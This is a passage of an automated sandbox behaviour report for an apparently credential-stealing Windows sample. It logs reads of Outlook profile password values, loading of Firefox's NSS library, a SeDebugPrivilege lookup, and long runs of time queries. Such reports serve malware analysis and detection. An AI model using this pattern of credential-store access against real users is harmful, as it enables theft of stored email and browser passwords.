| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = ProductId, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgJITDebugLaunchSetting, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgManagedDebugger, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = Email, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = Email, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP Password, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Password, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Get Key Info | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 |
Module (62)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x75690000 |
|
1 | |
| Load | C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll | base_address = 0x6a310000 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\\vcruntime140.dll | base_address = 0x0 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\mozglue.dll | base_address = 0x70620000 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x70330000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x76ad0000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
4 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x7569ca24 |
|
1 | |
| Get Address | Unknown module name | function = ResetSecurity, address_out = 0x6a311944 |
|
1 | |
| Get Address | Unknown module name | function = SetSecurity, address_out = 0x6a311986 |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServices, address_out = 0x6a3119cc |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServicesObject, address_out = 0x6a311a1e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyHandle, address_out = 0x6a311a70 |
|
1 | |
| Get Address | Unknown module name | function = WritePropertyValue, address_out = 0x6a311a89 |
|
1 | |
| Get Address | Unknown module name | function = Clone, address_out = 0x6a311aa2 |
|
2 | |
| Get Address | Unknown module name | function = VerifyClientKey, address_out = 0x6a312270 |
|
1 | |
| Get Address | Unknown module name | function = GetQualifierSet, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = Get, address_out = 0x6a311b96 |
|
1 | |
| Get Address | Unknown module name | function = Put, address_out = 0x6a311b7a |
|
1 | |
| Get Address | Unknown module name | function = Delete, address_out = 0x6a311bb5 |
|
1 | |
| Get Address | Unknown module name | function = GetNames, address_out = 0x6a311bc8 |
|
1 | |
| Get Address | Unknown module name | function = BeginEnumeration, address_out = 0x6a311be4 |
|
1 | |
| Get Address | Unknown module name | function = Next, address_out = 0x6a311bf7 |
|
1 | |
| Get Address | Unknown module name | function = EndEnumeration, address_out = 0x6a311c16 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyQualifierSet, address_out = 0x6a311c26 |
|
1 | |
| Get Address | Unknown module name | function = GetObjectText, address_out = 0x6a311c3c |
|
1 | |
| Get Address | Unknown module name | function = SpawnDerivedClass, address_out = 0x6a311c52 |
|
1 | |
| Get Address | Unknown module name | function = SpawnInstance, address_out = 0x6a311c68 |
|
1 | |
| Get Address | Unknown module name | function = CompareTo, address_out = 0x6a311c7e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyOrigin, address_out = 0x6a311c94 |
|
1 | |
| Get Address | Unknown module name | function = InheritsFrom, address_out = 0x6a311caa |
|
1 | |
| Get Address | Unknown module name | function = GetMethod, address_out = 0x6a311cbd |
|
1 | |
| Get Address | Unknown module name | function = PutMethod, address_out = 0x6a311cd9 |
|
1 | |
| Get Address | Unknown module name | function = DeleteMethod, address_out = 0x6a311cf5 |
|
1 | |
| Get Address | Unknown module name | function = BeginMethodEnumeration, address_out = 0x6a311d08 |
|
1 | |
| Get Address | Unknown module name | function = NextMethod, address_out = 0x6a311d1b |
|
1 | |
| Get Address | Unknown module name | function = EndMethodEnumeration, address_out = 0x6a311d37 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodQualifierSet, address_out = 0x6a311d47 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodOrigin, address_out = 0x6a311d5d |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Get, address_out = 0x6a311d86 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Put, address_out = 0x6a311da2 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Delete, address_out = 0x6a311dbb |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_GetNames, address_out = 0x6a311dce |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Next, address_out = 0x6a311df7 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 |
|
1 | |
| Get Address | Unknown module name | function = GetCurrentApartmentType, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = GetDemultiplexedStub, address_out = 0x6a3118fd |
|
1 | |
| Get Address | Unknown module name | function = CreateInstanceEnumWmi, address_out = 0x6a311580 |
|
1 | |
| Get Address | Unknown module name | function = CreateClassEnumWmi, address_out = 0x6a3115f6 |
|
1 | |
| Get Address | Unknown module name | function = ExecQueryWmi, address_out = 0x6a31169e |
|
1 | |
| Get Address | Unknown module name | function = ExecNotificationQueryWmi, address_out = 0x6a311717 |
|
1 | |
| Get Address | Unknown module name | function = PutInstanceWmi, address_out = 0x6a311790 |
|
1 | |
| Get Address | Unknown module name | function = PutClassWmi, address_out = 0x6a311810 |
|
1 | |
| Get Address | Unknown module name | function = CloneEnumWbemClassObject, address_out = 0x6a311890 |
|
1 | |
| Get Address | Unknown module name | function = ConnectServerWmi, address_out = 0x6a3124b7 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcW, address_out = 0x772625dd |
|
1 | |
| Get Address | Unknown module name | function = NSS_Init, address_out = 0x703ed70b |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Window (6)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = 18446744073709551612, new_long = 1998988765 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = 18446744073709551612, new_long = 2364170 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 1998988765 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 2365370 |
|
1 |
System (754)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XABNCPUWKW |
|
2 | |
| Get Time | type = System Time, time = 2018-04-18 04:36:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:36:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:36:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:37:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1602-08-19 08:44:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1602-08-19 08:44:14 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 1627-01-30 19:47:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:49 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:50 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:51 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:53 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:54 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:55 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:56 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:38:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:06 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:37 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:39 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:40 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:41 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:43 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:44 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:45 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:46 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:47 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:48 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:49 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:50 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:51 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:52 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:53 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:54 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:55 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:56 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:58 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:39:59 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:00 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:01 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:02 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:03 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:04 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:05 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:06 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:08 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:09 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:10 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:11 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:12 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:13 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:14 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:15 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:16 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:17 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:18 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:19 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:20 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:21 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:22 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:23 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:24 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:25 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:26 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:27 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:28 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:29 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:30 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:31 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:32 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:33 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:34 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:35 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:36 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-18 04:40:39 (UTC) |
|
1 | |
